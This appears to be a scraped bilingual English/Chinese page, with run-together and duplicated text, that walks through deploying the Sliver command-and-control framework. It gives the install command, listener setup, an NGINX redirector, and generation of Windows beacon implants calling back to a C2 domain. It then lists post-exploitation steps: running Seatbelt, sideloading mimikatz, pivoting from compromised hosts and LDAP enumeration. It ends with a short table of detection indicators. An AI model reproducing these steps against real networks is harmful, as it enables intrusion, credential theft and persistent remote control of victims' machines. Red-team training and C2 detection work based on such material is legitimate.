Loading...
Loading...
Compare original and translation side by side
curl https://sliver.sh/install | sudo bashsystemctl start sliver
# Or run interactively
sliver-servernew-operator --name operator1 --lhost <team-server-ip>curl https://sliver.sh/install | sudo bashsystemctl start sliver
# 或以交互式方式运行
sliver-servernew-operator --name operator1 --lhost <team-server-ip>https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /path/to/cert.pem --key /path/to/key.pemdns --domains c2dns.example.com --lport 53mtls --lhost 0.0.0.0 --lport 8888wg --lport 51820https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /path/to/cert.pem --key /path/to/key.pemdns --domains c2dns.example.com --lport 53mtls --lhost 0.0.0.0 --lport 8888wg --lport 51820server {
listen 443 ssl;
server_name c2.example.com;
ssl_certificate /etc/letsencrypt/live/c2.example.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/c2.example.com/privkey.pem;
location / {
proxy_pass https://<team-server-ip>:443;
proxy_ssl_verify off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
}
}iptables -A INPUT -p tcp --dport 443 -s <redirector-ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROPserver {
listen 443 ssl;
server_name c2.example.com;
ssl_certificate /etc/letsencrypt/live/c2.example.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/c2.example.com/privkey.pem;
location / {
proxy_pass https://<team-server-ip>:443;
proxy_ssl_verify off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
}
}iptables -A INPUT -p tcp --dport 443 -s <redirector-ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROPgenerate beacon --http https://c2.example.com --os windows --arch amd64 --format exe --name payloadgenerate beacon --dns c2dns.example.com --os windows --arch amd64generate --http https://c2.example.com --os windows --arch amd64 --format shellcodegenerate beacon --http https://c2.example.com --seconds 60 --jitter 30generate beacon --http https://c2.example.com --os windows --arch amd64 --format exe --name payloadgenerate beacon --dns c2dns.example.com --os windows --arch amd64generate --http https://c2.example.com --os windows --arch amd64 --format shellcodegenerate beacon --http https://c2.example.com --seconds 60 --jitter 30beacons # List active beacons
use <beacon-id> # Interact with a beaconps # Process listing
netstat # Network connections
execute-assembly /path/to/Seatbelt.exe -group=all # Run .NET assemblies
sideload /path/to/mimikatz.dll # Load DLLspivots tcp --bind 0.0.0.0:9898 # Create pivot listener on compromised hostarmory install sa-ldapsearch # Install from armory
sa-ldapsearch -- "(objectClass=user)" # Execute BOFbeacons # 列出活跃beacon
use <beacon-id> # 与指定beacon交互ps # 进程列表
netstat # 网络连接
execute-assembly /path/to/Seatbelt.exe -group=all # 运行.NET程序集
sideload /path/to/mimikatz.dll # 加载DLLpivots tcp --bind 0.0.0.0:9898 # 在受感染主机上创建pivot监听器armory install sa-ldapsearch # 从armory安装
sa-ldapsearch -- "(objectClass=user)" # 执行BOF| Tool | Purpose | Platform |
|---|---|---|
| Sliver Server | C2 team server and implant management | Linux/macOS/Windows |
| Sliver Client | Operator console for team members | Cross-platform |
| NGINX | Redirector and reverse proxy | Linux |
| Certbot | Let's Encrypt SSL certificate generation | Linux |
| Cloudflare | CDN and domain fronting | Cloud |
| Armory | Sliver extension/BOF package manager | Built-in |
| 工具 | 用途 | 平台 |
|---|---|---|
| Sliver Server | C2团队服务器与植入程序管理 | Linux/macOS/Windows |
| Sliver Client | 团队成员操作员控制台 | 跨平台 |
| NGINX | 重定向器与反向代理 | Linux |
| Certbot | Let's Encrypt SSL证书生成 | Linux |
| Cloudflare | CDN与域名前置 | 云端 |
| Armory | Sliver扩展/BOF包管理器 | 内置 |
| Indicator | Detection Method |
|---|---|
| Default Sliver HTTP headers | Network traffic analysis for unusual User-Agent strings |
| mTLS on non-standard ports | Firewall logs for outbound connections to unusual ports |
| DNS TXT record queries with high entropy | DNS log analysis for encoded C2 traffic |
| WireGuard UDP traffic on port 51820 | Network flow analysis for WireGuard handshake patterns |
| Sliver implant file hashes | EDR/AV signature matching against known Sliver samples |
| 指标 | 检测方法 |
|---|---|
| 默认Sliver HTTP头 | 分析网络流量中的异常User-Agent字符串 |
| 非标准端口上的mTLS | 分析防火墙日志中的非标准端口出站连接 |
| 高熵DNS TXT记录查询 | 分析DNS日志中的编码C2流量 |
| 51820端口上的WireGuard UDP流量 | 分析网络流中的WireGuard握手模式 |
| Sliver植入程序文件哈希 | EDR/AV根据已知Sliver样本进行特征匹配 |